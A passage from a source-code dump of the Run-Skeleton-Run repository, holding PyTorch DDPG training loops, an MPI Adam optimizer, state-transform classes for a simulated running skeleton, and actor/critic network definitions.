to_tensor(observations),\n actor(to_tensor(observations))\n )\n\n policy_loss = torch.mean(policy_loss * weights)\n policy_loss.backward()\n\n torch.nn.utils.clip_grad_norm(actor.parameters(), args.grad_clip)\n for param_group in actor_optim.param_groups:\n param_group[\"lr\"] = actor_lr\n\n actor_optim.step()\n\n # Target update\n soft_update(target_actor, actor, args.tau)\n soft_update(target_critic, critic, args.tau)\n\n metrics = {\n \"value_loss\": value_loss,\n \"policy_loss\": policy_loss\n }\n\n td_v_values = critic(\n to_tensor(observations, volatile=True, requires_grad=False),\n to_tensor(actions, volatile=True, requires_grad=False))\n td_error = td_target - td_v_values\n\n info = {\n \"td_error\": to_numpy(td_error)\n }\n\n return metrics, info\n\n def save_fn(episode=None):\n nonlocal actor, critic\n if episode is None:\n save_path = args.logdir\n else:\n save_path = \"{}/episode_{}\".format(args.logdir, episode)\n create_if_need(save_path)\n torch.save(actor.state_dict(), \"{}/actor_state_dict.pkl\".format(save_path))\n torch.save(critic.state_dict(), \"{}/critic_state_dict.pkl\".format(save_path))\n torch.save(target_actor.state_dict(), \"{}/target_actor_state_dict.pkl\".format(save_path))\n torch.save(target_critic.state_dict(), \"{}/target_critic_state_dict.pkl\".format(save_path))\n\n return act_fn, update_fn, save_fn\n\n\ndef train_multi_thread(actor, critic, target_actor, target_critic, args, prepare_fn, best_reward):\n workerseed = args.seed + 241 * args.thread\n set_global_seeds(workerseed)\n\n args.logdir = \"{}/thread_{}\".format(args.logdir, args.thread)\n create_if_need(args.logdir)\n\n act_fn, update_fn, save_fn = prepare_fn(actor, critic, target_actor, target_critic, args)\n logger = Logger(args.logdir)\n\n buffer = create_buffer(args)\n if args.prioritized_replay:\n beta_deacy_fn = create_decay_fn(\n \"linear\",\n initial_value=args.prioritized_replay_beta0,\n final_value=1.0,\n max_step=args.max_episodes)\n\n env = create_env(args)\n random_process = create_random_process(args)\n\n actor_learning_rate_decay_fn = create_decay_fn(\n \"linear\",\n initial_value=args.actor_lr,\n final_value=args.actor_lr_end,\n max_step=args.max_episodes)\n critic_learning_rate_decay_fn = create_decay_fn(\n \"linear\",\n initial_value=args.critic_lr,\n final_value=args.critic_lr_end,\n max_step=args.max_episodes)\n\n epsilon_cycle_len = random.randint(args.epsilon_cycle_len // 2, args.epsilon_cycle_len * 2)\n\n epsilon_decay_fn = create_decay_fn(\n \"cycle\",\n initial_value=args.initial_epsilon,\n final_value=args.final_epsilon,\n cycle_len=epsilon_cycle_len,\n num_cycles=args.max_episodes // epsilon_cycle_len)\n\n episode = 0\n step = 0\n start_time = time.time()\n while episode < args.max_episodes:\n if episode % 100 == 0:\n env = create_env(args)\n seed = random.randrange(2 ** 32 - 2)\n\n actor_lr = actor_learning_rate_decay_fn(episode)\n critic_lr = critic_learning_rate_decay_fn(episode)\n epsilon = min(args.initial_epsilon, max(args.final_epsilon, epsilon_decay_fn(episode)))\n\n episode_metrics = {\n \"value_loss\": 0.0,\n \"policy_loss\": 0.0,\n \"reward\": 0.0,\n \"step\": 0,\n \"epsilon\": epsilon\n }\n\n observation = env.reset(seed=seed, difficulty=args.difficulty)\n random_process.reset_states()\n done = False\n\n while not done:\n action = act_fn(observation, noise=epsilon*random_process.sample())\n next_observation, reward, done, _ = env.step(action)\n\n buffer.add(observation, action, reward, next_observation, done)\n episode_metrics[\"reward\"] += reward\n 
episode_metrics[\"step\"] += 1\n\n if len(buffer) >= args.train_steps:\n\n if args.prioritized_replay:\n (tr_observations, tr_actions, tr_rewards, tr_next_observations, tr_dones,\n weights, batch_idxes) = \\\n buffer.sample(batch_size=args.batch_size, beta=beta_deacy_fn(episode))\n else:\n (tr_observations, tr_actions, tr_rewards, tr_next_observations, tr_dones) = \\\n buffer.sample(batch_size=args.batch_size)\n weights, batch_idxes = np.ones_like(tr_rewards), None\n\n step_metrics, step_info = update_fn(\n tr_observations, tr_actions, tr_rewards,\n tr_next_observations, tr_dones,\n weights, actor_lr, critic_lr)\n\n if args.prioritized_replay:\n new_priorities = np.abs(step_info[\"td_error\"]) + 1e-6\n buffer.update_priorities(batch_idxes, new_priorities)\n\n for key, value in step_metrics.items():\n value = to_numpy(value)[0]\n episode_metrics[key] += value\n\n observation = next_observation\n\n episode += 1\n\n if episode_metrics[\"reward\"] > 15.0 * args.reward_scale \\\n and episode_metrics[\"reward\"] > best_reward.value:\n best_reward.value = episode_metrics[\"reward\"]\n logger.scalar_summary(\"best reward\", best_reward.value, episode)\n save_fn(episode)\n\n step += episode_metrics[\"step\"]\n elapsed_time = time.time() - start_time\n\n for key, value in episode_metrics.items():\n value = value if \"loss\" not in key else value / episode_metrics[\"step\"]\n logger.scalar_summary(key, value, episode)\n logger.scalar_summary(\n \"episode per minute\",\n episode / elapsed_time * 60,\n episode)\n logger.scalar_summary(\n \"step per second\",\n step / elapsed_time,\n episode)\n logger.scalar_summary(\"actor lr\", actor_lr, episode)\n logger.scalar_summary(\"critic lr\", critic_lr, episode)\n\n if episode % args.save_step == 0:\n save_fn(episode)\n\n if elapsed_time > 86400 * args.max_train_days:\n episode = args.max_episodes + 1\n\n save_fn(episode)\n\n raise KeyboardInterrupt\n\n\ndef train_single_thread(\n actor, critic, target_actor, target_critic, args, prepare_fn,\n global_episode, global_update_step, episodes_queue):\n workerseed = args.seed + 241 * args.thread\n set_global_seeds(workerseed)\n\n args.logdir = \"{}/thread_{}\".format(args.logdir, args.thread)\n create_if_need(args.logdir)\n\n _, update_fn, save_fn = prepare_fn(actor, critic, target_actor, target_critic, args)\n\n logger = Logger(args.logdir)\n\n buffer = create_buffer(args)\n\n if args.prioritized_replay:\n beta_deacy_fn = create_decay_fn(\n \"linear\",\n initial_value=args.prioritized_replay_beta0,\n final_value=1.0,\n max_step=args.max_update_steps)\n\n actor_learning_rate_decay_fn = create_decay_fn(\n \"linear\",\n initial_value=args.actor_lr,\n final_value=args.actor_lr_end,\n max_step=args.max_update_steps)\n critic_learning_rate_decay_fn = create_decay_fn(\n \"linear\",\n initial_value=args.critic_lr,\n final_value=args.critic_lr_end,\n max_step=args.max_update_steps)\n\n update_step = 0\n received_examples = 1 # just hack\n while global_episode.value < args.max_episodes * (args.num_threads - args.num_train_threads) \\\n and global_update_step.value < args.max_update_steps * args.num_train_threads:\n actor_lr = actor_learning_rate_decay_fn(update_step)\n critic_lr = critic_learning_rate_decay_fn(update_step)\n\n actor_lr = min(args.actor_lr, max(args.actor_lr_end, actor_lr))\n critic_lr = min(args.critic_lr, max(args.critic_lr_end, critic_lr))\n\n while True:\n try:\n replay = episodes_queue.get_nowait()\n for (observation, action, reward, next_observation, done) in replay:\n buffer.add(observation, action, 
reward, next_observation, done)\n received_examples += len(replay)\n except py_queue.Empty:\n break\n\n if len(buffer) >= args.train_steps:\n if args.prioritized_replay:\n beta = beta_deacy_fn(update_step)\n beta = min(1.0, max(args.prioritized_replay_beta0, beta))\n (tr_observations, tr_actions, tr_rewards, tr_next_observations, tr_dones,\n weights, batch_idxes) = \\\n buffer.sample(\n batch_size=args.batch_size,\n beta=beta)\n else:\n (tr_observations, tr_actions, tr_rewards, tr_next_observations, tr_dones) = \\\n buffer.sample(batch_size=args.batch_size)\n weights, batch_idxes = np.ones_like(tr_rewards), None\n\n step_metrics, step_info = update_fn(\n tr_observations, tr_actions, tr_rewards,\n tr_next_observations, tr_dones,\n weights, actor_lr, critic_lr)\n\n update_step += 1\n global_update_step.value += 1\n\n if args.prioritized_replay:\n new_priorities = np.abs(step_info[\"td_error\"]) + 1e-6\n buffer.update_priorities(batch_idxes, new_priorities)\n\n for key, value in step_metrics.items():\n value = to_numpy(value)[0]\n logger.scalar_summary(key, value, update_step)\n\n logger.scalar_summary(\"actor lr\", actor_lr, update_step)\n logger.scalar_summary(\"critic lr\", critic_lr, update_step)\n\n if update_step % args.save_step == 0:\n save_fn(update_step)\n else:\n time.sleep(1)\n\n logger.scalar_summary(\"buffer size\", len(buffer), global_episode.value)\n logger.scalar_summary(\n \"updates per example\",\n update_step * args.batch_size / received_examples,\n global_episode.value)\n\n save_fn(update_step)\n\n raise KeyboardInterrupt\n\n\ndef play_single_thread(\n actor, critic, target_actor, target_critic, args, prepare_fn,\n global_episode, global_update_step, episodes_queue,\n best_reward):\n workerseed = args.seed + 241 * args.thread\n set_global_seeds(workerseed)\n\n args.logdir = \"{}/thread_{}\".format(args.logdir, args.thread)\n create_if_need(args.logdir)\n\n act_fn, _, save_fn = prepare_fn(actor, critic, target_actor, target_critic, args)\n\n logger = Logger(args.logdir)\n env = create_env(args)\n random_process = create_random_process(args)\n\n epsilon_cycle_len = random.randint(args.epsilon_cycle_len // 2, args.epsilon_cycle_len * 2)\n\n epsilon_decay_fn = create_decay_fn(\n \"cycle\",\n initial_value=args.initial_epsilon,\n final_value=args.final_epsilon,\n cycle_len=epsilon_cycle_len,\n num_cycles=args.max_episodes // epsilon_cycle_len)\n\n episode = 1\n step = 0\n start_time = time.time()\n while global_episode.value < args.max_episodes * (args.num_threads - args.num_train_threads) \\\n and global_update_step.value < args.max_update_steps * args.num_train_threads:\n if episode % 100 == 0:\n env = create_env(args)\n seed = random.randrange(2 ** 32 - 2)\n\n epsilon = min(args.initial_epsilon, max(args.final_epsilon, epsilon_decay_fn(episode)))\n\n episode_metrics = {\n \"reward\": 0.0,\n \"step\": 0,\n \"epsilon\": epsilon\n }\n\n observation = env.reset(seed=seed, difficulty=args.difficulty)\n random_process.reset_states()\n done = False\n\n replay = []\n while not done:\n action = act_fn(observation, noise=epsilon * random_process.sample())\n next_observation, reward, done, _ = env.step(action)\n\n replay.append((observation, action, reward, next_observation, done))\n episode_metrics[\"reward\"] += reward\n episode_metrics[\"step\"] += 1\n\n observation = next_observation\n\n episodes_queue.put(replay)\n\n episode += 1\n global_episode.value += 1\n\n if episode_metrics[\"reward\"] > best_reward.value:\n best_reward.value = episode_metrics[\"reward\"]\n 
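# best_reward is a shared multiprocessing.Value, so sampler threads compare against a global best\n            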
logger.scalar_summary(\"best reward\", best_reward.value, episode)\n\n if episode_metrics[\"reward\"] > 15.0 * args.reward_scale:\n save_fn(episode)\n\n step += episode_metrics[\"step\"]\n elapsed_time = time.time() - start_time\n\n for key, value in episode_metrics.items():\n logger.scalar_summary(key, value, episode)\n logger.scalar_summary(\n \"episode per minute\",\n episode / elapsed_time * 60,\n episode)\n logger.scalar_summary(\n \"step per second\",\n step / elapsed_time,\n episode)\n\n if elapsed_time > 86400 * args.max_train_days:\n global_episode.value = args.max_episodes * (args.num_threads - args.num_train_threads) + 1\n\n raise KeyboardInterrupt\n"
},
{
"alpha_fraction": 0.5630457401275635,
"alphanum_fraction": 0.583304226398468,
"avg_line_length": 32.68235397338867,
"blob_id": "4e16126fce528ae1ec44f82f1d66f7a6b3285417",
"content_id": "70fb22fb0efdea24d751af1b98db7da338995386",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2863,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 85,
"path": "/baselines/baselines_common/mpi_adam.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from mpi4py import MPI\nimport baselines.baselines_common.tf_util as U\nimport tensorflow as tf\nimport numpy as np\n\n\nclass MpiAdam(object):\n def __init__(self, var_list, *,\n beta1=0.9, beta2=0.999, epsilon=1e-08,\n scale_grad_by_procs=True,\n comm=None):\n self.var_list = var_list\n self.beta1 = beta1\n self.beta2 = beta2\n self.epsilon = epsilon\n self.scale_grad_by_procs = scale_grad_by_procs\n size = sum(U.numel(v) for v in var_list)\n self.m = np.zeros(size, 'float32')\n self.v = np.zeros(size, 'float32')\n\n self.t = 0\n self.setfromflat = U.SetFromFlat(var_list)\n self.getflat = U.GetFlat(var_list)\n self.comm = MPI.COMM_WORLD if comm is None else comm\n\n def update(self, localg, stepsize):\n if self.t % 100 == 0:\n self.check_synced()\n localg = localg.astype('float32')\n globalg = np.zeros_like(localg)\n self.comm.Allreduce(localg, globalg, op=MPI.SUM)\n if self.scale_grad_by_procs:\n globalg /= self.comm.Get_size()\n\n self.t += 1\n a = stepsize * np.sqrt(1 - self.beta2 ** self.t) / (1 - self.beta1 ** self.t)\n self.m = self.beta1 * self.m + (1 - self.beta1) * globalg\n self.v = self.beta2 * self.v + (1 - self.beta2) * (globalg * globalg)\n step = (- a) * self.m / (np.sqrt(self.v) + self.epsilon)\n self.setfromflat(self.getflat() + step)\n\n def sync(self):\n theta = self.getflat()\n self.comm.Bcast(theta, root=0)\n self.setfromflat(theta)\n\n def check_synced(self):\n if self.comm.Get_rank() == 0: # this is root\n theta = self.getflat()\n self.comm.Bcast(theta, root=0)\n else:\n thetalocal = self.getflat()\n thetaroot = np.empty_like(thetalocal)\n self.comm.Bcast(thetaroot, root=0)\n assert (thetaroot == thetalocal).all(), (thetaroot, thetalocal)\n\n\[email protected]_session\ndef test_MpiAdam():\n np.random.seed(0)\n tf.set_random_seed(0)\n\n a = tf.Variable(np.random.randn(3).astype('float32'))\n b = tf.Variable(np.random.randn(2, 5).astype('float32'))\n loss = tf.reduce_sum(tf.square(a)) + tf.reduce_sum(tf.sin(b))\n\n stepsize = 1e-2\n update_op = tf.train.AdamOptimizer(stepsize).minimize(loss)\n do_update = U.function([], loss, updates=[update_op])\n\n tf.get_default_session().run(tf.global_variables_initializer())\n for i in range(10):\n print(i, do_update())\n\n tf.set_random_seed(0)\n tf.get_default_session().run(tf.global_variables_initializer())\n\n var_list = [a, b]\n lossandgrad = U.function([], [loss, U.flatgrad(loss, var_list)], updates=[update_op])\n adam = MpiAdam(var_list)\n\n for i in range(10):\n l, g = lossandgrad()\n adam.update(g, stepsize)\n print(i, l)\n"
},
{
"alpha_fraction": 0.5336737632751465,
"alphanum_fraction": 0.5396684408187866,
"avg_line_length": 39.21428680419922,
"blob_id": "0485b2acb5383803693d3bb0c4efaea7c08a8c3d",
"content_id": "746f012a3ad9c1f319b4b09e0bf26fc0d9ee8196",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13512,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 336,
"path": "/common/state_transform.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from __future__ import division\nimport numpy as np\nfrom collections import OrderedDict\n\n\ndef get_state_names(all=False, obst=False):\n names = ['pelvis_' + n for n in ('rot', 'x', 'y')]\n names += ['pelvis_vel_' + n for n in ('rot', 'x', 'y')]\n names += ['hip_right', 'knee_right', 'ankle_right', 'hip_left', 'knee_left', 'ankle_left']\n names += ['hip_right_vel', 'knee_right_vel', 'ankle_right_vel', 'hip_left_vel', 'knee_left_vel', 'ankle_left_vel']\n names += ['mass_x', 'mass_y']\n names += ['mass_x_vel', 'mass_y_vel']\n\n if all:\n names += [b + '_' + i for b in ['head', 'pelvis2', 'torso', 'toes_left',\n 'toes_right', 'talus_left', 'talus_right'] for i in\n ['x', 'y']]\n else:\n names += [b + '_' + i for b in ['head', 'torso', 'toes_left', 'toes_right',\n 'talus_left', 'talus_right'] for i in\n ['x', 'y']]\n\n names += ['muscle_left', 'muscle_right']\n if obst:\n names += ['obst_dist', 'obst_y', 'obst_r']\n return names\n\n\ndef get_names_to_center(centr):\n if centr == 'pelvis':\n pelvis_or_mass = 'mass'\n elif centr == 'mass':\n pelvis_or_mass = 'pelvis'\n else:\n raise ValueError('centr should be in [mass or pelvis], not {}'.format(centr))\n return [b + '_x' for b in ['head', pelvis_or_mass, 'torso', 'toes_left',\n 'toes_right', 'talus_left', 'talus_right']]\n\n\ndef get_bodies_names():\n return [b + '_' + i for b in ['head', 'torso', 'toes_left', 'toes_right', 'talus_left', 'talus_right']\n for i in ['x', 'y']]\n\n\ndef get_names_obstacles():\n return ['toes_left', 'toes_right', 'talus_left', 'talus_right']\n\n\ndef calculate_velocity(cur, prev):\n if prev is None:\n return np.zeros_like(cur)\n return 100.*(cur - prev)\n\n\ndef _get_pattern_idxs(lst, pattern):\n idxs = [i for i, x in enumerate(lst) if pattern in x]\n return idxs\n\n\nclass State(object):\n def __init__(self, obstacles_mode='bodies_dist', obst_grid_dist=1,\n grid_points=100, predict_bodies=True, add_step=True, osb_first=False):\n assert obstacles_mode in ['exclude', 'grid', 'bodies_dist', 'standard']\n\n self.state_idxs = [i for i, n in enumerate(get_state_names(True, True)) if n not in ['pelvis2_x', 'pelvis2_y']]\n self.state_names = get_state_names()\n self.step = 0\n self.add_step = add_step\n self.osb_first = osb_first\n self.obstacles_mode = obstacles_mode\n self.obstacles = OrderedDict()\n\n self.obst_names = []\n if obstacles_mode == 'standard':\n self.obst_names = ['obst_dist', 'obst_y', 'obst_r']\n elif obstacles_mode == 'grid':\n self.obst_names = ['obst_grid_{}'.format(i) for i in range(grid_points)]\n self.obst_grid_dist = obst_grid_dist\n self.obst_grid_points = grid_points\n self.obst_grid_size = obst_grid_dist * 2 / grid_points\n elif obstacles_mode == 'bodies_dist':\n self._obst_names = get_names_obstacles()\n for i in range(3):\n for n in self._obst_names:\n self.obst_names.append('{}_{}_obst_x_start'.format(n, i))\n self.obst_names.append('{}_{}_obst_x_end'.format(n, i))\n self.obst_names.append('{}_{}_obst_y'.format(n, i))\n self.obst_names.append('is_obstacle')\n\n if self.add_step:\n self.state_names.append('step')\n\n self.predict_bodies = predict_bodies\n self.bodies_idxs_x = [self.state_names.index(n) for n in get_bodies_names() if n.endswith('_x')]\n self.bodies_idxs_y = [self.state_names.index(n) for n in get_bodies_names() if n.endswith('_y')]\n self.bodies_idxs = self.bodies_idxs_x + self.bodies_idxs_y\n self.mass_x_idx = self.state_names.index('mass_x')\n self.mass_y_idx = self.state_names.index('mass_y')\n\n self.state_names_out = self.state_names\n 
self._set_left_right()\n\n    def _set_left_right(self):\n        self.left_idxs = _get_pattern_idxs(self.state_names, '_left')\n        self.right_idxs = _get_pattern_idxs(self.state_names, '_right')\n\n    def reset(self):\n        self.step = 0\n        self.prev_orig = None\n        self.prev_pred = None\n        self.obstacles = OrderedDict()\n\n    def _predict_bodies(self, state):\n        state = np.copy(state)\n\n        if self.step > 0:\n\n            def update_bodies(cur, prev_orig, prev_pred, d):\n                flt = cur == prev_orig\n                cur[flt] = prev_pred[flt] + d\n\n            # orig vs. pred does not matter here\n            dx = state[self.mass_x_idx] - self.prev_orig[self.mass_x_idx]\n            dy = state[self.mass_y_idx] - self.prev_orig[self.mass_y_idx]\n\n            cur_bodies_x = state[self.bodies_idxs_x]\n            cur_bodies_y = state[self.bodies_idxs_y]\n\n            # needed for filtering\n            prev_orig_bodies_x = self.prev_orig[self.bodies_idxs_x]\n            prev_orig_bodies_y = self.prev_orig[self.bodies_idxs_y]\n\n            # needed for updating\n            prev_pred_bodies_x = self.prev_pred[self.bodies_idxs_x]\n            prev_pred_bodies_y = self.prev_pred[self.bodies_idxs_y]\n\n            update_bodies(cur_bodies_x, prev_orig_bodies_x, prev_pred_bodies_x, dx)\n            update_bodies(cur_bodies_y, prev_orig_bodies_y, prev_pred_bodies_y, dy)\n\n            state[self.bodies_idxs_x] = cur_bodies_x\n            state[self.bodies_idxs_y] = cur_bodies_y\n        return state\n\n    def _add_obstacle(self, state):\n        pelvis_x = state[1]\n        obstacle_x = state[-3]\n\n        if obstacle_x != 100:\n            obstacle_x += pelvis_x\n            if round(obstacle_x, 5) not in self.obstacles:\n                self.obstacles[round(obstacle_x, 5)] = [obstacle_x, state[-2], state[-1]]\n                #print('obstacles {}, step {}'.format(self.obstacles.keys(), self.step))\n                if len(self.obstacles) > 3:\n                    print('warning: more than 3 obstacles')\n\n    def _get_obstacle_state_reward(self, state):\n        is_obst = float(state[-3] != 100)\n\n        if self.obstacles_mode == 'exclude':\n            return [is_obst], 0.\n        elif self.obstacles_mode == 'standard':\n            if not is_obst:\n                return [-1., 0., 0., is_obst], 0.\n            obst_features = np.clip(state[-3:], -10., 10.)\n            return np.append(obst_features, is_obst), 0.\n        elif self.obstacles_mode == 'grid':\n            mass_x = state[self.state_names.index('mass_x')]\n            obst_grid = np.zeros(self.obst_grid_points)\n            for k, v in self.obstacles.items():\n                obst_x, obst_y, obst_r = v\n                obst_h = obst_y + obst_r\n                obst_left = int(np.ceil((obst_x - mass_x - obst_r) / self.obst_grid_size) + self.obst_grid_points // 2)\n                obst_right = int(np.ceil((obst_x - mass_x + obst_r) / self.obst_grid_size) + self.obst_grid_points // 2)\n                obst_left = max(obst_left, 0)\n                obst_right = max(obst_right, -1)\n                obst_grid[obst_left:obst_right + 1] = obst_h\n            obst_features = np.append(obst_grid, is_obst)\n            return obst_features, 0\n        else:\n            obst_state = []\n            obst_reward = 0\n            for i in range(3):\n                if i >= len(self.obstacles):\n                    for n in self._obst_names:\n                        body_y = state[self.state_names.index(n + '_y')]\n                        obst_state.extend([10, 10, body_y])\n                else:\n                    v = list(self.obstacles.values())[i]\n                    obst_x, obst_y, obst_r = v\n                    obst_h = obst_y + obst_r\n                    obst_x_start = obst_x - obst_r\n                    obst_x_end = obst_x + obst_r\n                    for n in self._obst_names:\n                        body_x = state[self.state_names.index(n + '_x')]\n                        body_y = state[self.state_names.index(n + '_y')]\n                        obst_state.append(obst_x_start - body_x)\n                        obst_state.append(obst_x_end - body_x)\n                        obst_state.append(body_y - obst_h)\n                        if obst_reward >= 0 and body_x >= (obst_x_start - obst_r/2) \\\n                                and (body_x <= obst_x_end+obst_r/2) and (obst_h + obst_r/2) >= body_y:\n                            obst_reward = -0.5\n            obst_state.append(is_obst)\n            return np.asarray(obst_state), obst_reward\n\n    def process(self, state):\n        state = 
np.asarray(state)\n state = state[self.state_idxs]\n\n if self.osb_first and self.step == 0:\n state[-3:] = [100, 0, 0]\n\n self._add_obstacle(state)\n obst_state, obst_reward = self._get_obstacle_state_reward(state)\n state_orig = state[:-3]\n\n if self.add_step:\n state_orig = np.append(state_orig, 1. * self.step / 1000)\n\n if self.predict_bodies:\n state = self._predict_bodies(state_orig)\n else:\n state = state_orig\n\n self.step += 1\n self.prev_orig = state_orig\n self.prev_pred = np.copy(state)\n\n return (state, obst_state), obst_reward\n\n def flip_state(self, state, copy=True):\n assert np.ndim(state) == 1\n state = np.asarray(state)\n state = self.flip_states(state.reshape(1, -1), copy)\n return state.ravel()\n\n def flip_states(self, states, copy=True):\n assert np.ndim(states) == 2\n states = np.asarray(states)\n if copy:\n states = states.copy()\n left = states[:, self.left_idxs]\n right = states[:, self.right_idxs]\n states[:, self.left_idxs] = right\n states[:, self.right_idxs] = left\n return states\n\n @property\n def state_size(self):\n return len(self.state_names_out) + len(self.obst_names)\n\n\nclass StateVel(State):\n def __init__(self, vel_states=get_bodies_names(), obstacles_mode='bodies_dist',\n add_step=True, predict_bodies=True, osb_first=False):\n super(StateVel, self).__init__(obstacles_mode=obstacles_mode,\n predict_bodies=predict_bodies,\n add_step=add_step,\n osb_first=osb_first)\n self.vel_idxs = [self.state_names.index(k) for k in vel_states]\n self.prev_vals = None\n self.state_names += [n + '_vel' for n in vel_states]\n self.state_names_out = self.state_names\n # left right idxs\n self._set_left_right()\n\n def reset(self):\n super(StateVel, self).reset()\n self.prev_vals = None\n\n def process(self, state):\n (state, obst_state), obst_reward = super(StateVel, self).process(state)\n cur_vals = state[self.vel_idxs]\n vel = calculate_velocity(cur_vals, self.prev_vals)\n self.prev_vals = cur_vals\n state = np.concatenate((state, vel, obst_state))\n return state, obst_reward\n\n\nclass StateVelCentr(State):\n def __init__(self, centr_state='pelvis_x', vel_states=get_bodies_names(),\n states_to_center=get_names_to_center('pelvis'),\n vel_before_centr=True, obstacles_mode='bodies_dist',\n exclude_centr=False, predict_bodies=True,\n add_step=True, osb_first=False):\n super(StateVelCentr, self).__init__(obstacles_mode=obstacles_mode,\n predict_bodies=predict_bodies,\n add_step=add_step,\n osb_first=osb_first)\n\n # center\n self.centr_idx = self.state_names.index(centr_state)\n self.states_to_center = [self.state_names.index(k) for k in states_to_center]\n # velocities\n self.prev_vals = None\n self.vel_idxs = [self.state_names.index(k) for k in vel_states]\n self.vel_before_centr = vel_before_centr\n self.state_names += [n + '_vel' for n in vel_states]\n self.exclude_centr = exclude_centr\n\n if self.exclude_centr:\n self.state_names_out = self.state_names[:max(0, self.centr_idx)] + \\\n self.state_names[self.centr_idx + 1:]\n else:\n self.state_names_out = self.state_names\n\n # left right idxs\n self._set_left_right()\n\n def _set_left_right(self):\n state_names = self.state_names_out\n self.left_idxs = _get_pattern_idxs(state_names, '_left')\n self.right_idxs = _get_pattern_idxs(state_names, '_right')\n\n def reset(self):\n super(StateVelCentr, self).reset()\n self.prev_vals = None\n\n def process(self, state):\n (state, obst_state), obst_reward = super(StateVelCentr, self).process(state)\n\n if self.vel_before_centr:\n cur_vals = state[self.vel_idxs]\n vel 
= calculate_velocity(cur_vals, self.prev_vals)\n self.prev_vals = cur_vals\n state[self.states_to_center] -= state[self.centr_idx]\n else:\n state[self.states_to_center] -= state[self.centr_idx]\n cur_vals = state[self.vel_idxs]\n vel = calculate_velocity(cur_vals, self.prev_vals)\n self.prev_vals = cur_vals\n\n if self.exclude_centr:\n state = np.concatenate([state[:max(0, self.centr_idx)], state[self.centr_idx+1:]])\n\n state = np.concatenate((state, vel, obst_state))\n return state, obst_reward\n"
},
{
"alpha_fraction": 0.5821986198425293,
"alphanum_fraction": 0.5848555564880371,
"avg_line_length": 32.4555549621582,
"blob_id": "961f316e55214fa653a4c0180f87c062271d85bb",
"content_id": "b80e4724775d2f3ef408ee9015d557f064769822",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3011,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 90,
"path": "/ddpg/nets.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom common.nets import LinearNet\nfrom common.modules.NoisyLinear import NoisyLinear\n\n\ndef fanin_init(size, fanin=None):\n fanin = fanin or size[0]\n v = 1. / np.sqrt(fanin)\n return torch.Tensor(size).uniform_(-v, v)\n\n\nclass Actor(nn.Module):\n def __init__(self, n_observation, n_action,\n layers, activation=torch.nn.ELU,\n layer_norm=False,\n parameters_noise=False, parameters_noise_factorised=False,\n last_activation=torch.nn.Tanh, init_w=3e-3):\n super(Actor, self).__init__()\n\n if parameters_noise:\n def linear_layer(x_in, x_out):\n return NoisyLinear(x_in, x_out, factorised=parameters_noise_factorised)\n else:\n linear_layer = nn.Linear\n\n self.feature_net = LinearNet(\n layers=[n_observation] + layers,\n activation=activation,\n layer_norm=layer_norm,\n linear_layer=linear_layer)\n self.policy_net = LinearNet(\n layers=[self.feature_net.output_shape, n_action],\n activation=last_activation,\n layer_norm=False\n )\n self.init_weights(init_w)\n\n def init_weights(self, init_w):\n for layer in self.feature_net.net:\n if isinstance(layer, nn.Linear):\n layer.weight.data = fanin_init(layer.weight.data.size())\n\n for layer in self.policy_net.net:\n if isinstance(layer, nn.Linear):\n layer.weight.data.uniform_(-init_w, init_w)\n\n def forward(self, observation):\n x = observation\n x = self.feature_net.forward(x)\n x = self.policy_net.forward(x)\n return x\n\n\nclass Critic(nn.Module):\n def __init__(self, n_observation, n_action,\n layers, activation=torch.nn.ELU,\n layer_norm=False,\n parameters_noise=False, parameters_noise_factorised=False,\n init_w=3e-3):\n super(Critic, self).__init__()\n\n if parameters_noise:\n def linear_layer(x_in, x_out):\n return NoisyLinear(x_in, x_out, factorised=parameters_noise_factorised)\n else:\n linear_layer = nn.Linear\n\n self.feature_net = LinearNet(\n layers=[n_observation + n_action] + layers,\n activation=activation,\n layer_norm=layer_norm,\n linear_layer=linear_layer)\n self.value_net = nn.Linear(self.feature_net.output_shape, 1)\n self.init_weights(init_w)\n\n def init_weights(self, init_w):\n for layer in self.feature_net.net:\n if isinstance(layer, nn.Linear):\n layer.weight.data = fanin_init(layer.weight.data.size())\n\n self.value_net.weight.data.uniform_(-init_w, init_w)\n\n def forward(self, observation, action):\n x = torch.cat((observation, action), dim=1)\n x = self.feature_net.forward(x)\n x = self.value_net.forward(x)\n return x\n"
},
{
"alpha_fraction": 0.6867291331291199,
"alphanum_fraction": 0.6916625499725342,
"avg_line_length": 27.957143783569336,
"blob_id": "913591fdfab6facf7937ac2b9b907970831ed387",
"content_id": "2b9ebc352e51f639a057080e1264c83b955ed0b6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2027,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 70,
"path": "/ddpg/debug.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import os\nimport torch\nimport copy\nfrom multiprocessing import Value\n\nfrom common.misc_util import str2params, create_if_need\nfrom common.env_wrappers import create_env\nfrom common.torch_util import activations, hard_update\n\nfrom ddpg.model import create_model, create_act_update_fns, train_multi_thread\nfrom ddpg.train import parse_args\n\n\ndef debug(args, model_fn, act_update_fns, multi_thread):\n create_if_need(args.logdir)\n env = create_env(args)\n\n if args.flip_state_action and hasattr(env, \"state_transform\"):\n args.flip_states = env.state_transform.flip_states\n\n args.n_action = env.action_space.shape[0]\n args.n_observation = env.observation_space.shape[0]\n\n args.actor_layers = str2params(args.actor_layers)\n args.critic_layers = str2params(args.critic_layers)\n\n args.actor_activation = activations[args.actor_activation]\n args.critic_activation = activations[args.critic_activation]\n\n actor, critic = model_fn(args)\n\n if args.restore_actor_from is not None:\n actor.load_state_dict(torch.load(args.restore_actor_from))\n if args.restore_critic_from is not None:\n critic.load_state_dict(torch.load(args.restore_critic_from))\n\n actor.train()\n critic.train()\n actor.share_memory()\n critic.share_memory()\n\n target_actor = copy.deepcopy(actor)\n target_critic = 